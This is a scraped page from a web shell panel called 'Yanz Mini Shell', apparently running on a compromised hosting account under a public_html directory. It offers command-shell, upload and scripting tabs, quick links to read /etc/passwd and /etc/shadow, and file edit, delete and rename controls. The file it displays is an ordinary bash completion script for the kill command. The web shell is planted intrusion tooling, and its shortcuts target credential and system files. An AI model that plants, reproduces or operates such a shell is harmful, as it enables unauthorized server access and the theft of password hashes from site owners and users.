Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
hdhubreisen
public_html
gebase
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
# kill(1) completion -*- shell-script -*- _kill() { local cur prev words cword _init_completion || return case $prev in -s) _signals return ;; -l) return ;; esac if [[ $cword -eq 1 && "$cur" == -* ]]; then # return list of available signals _signals - COMPREPLY+=( $( compgen -W "-s -l" -- "$cur" ) ) else # return list of available PIDs _pids fi } && complete -F _kill kill # ex: filetype=sh
Free Space : 62667407360 Byte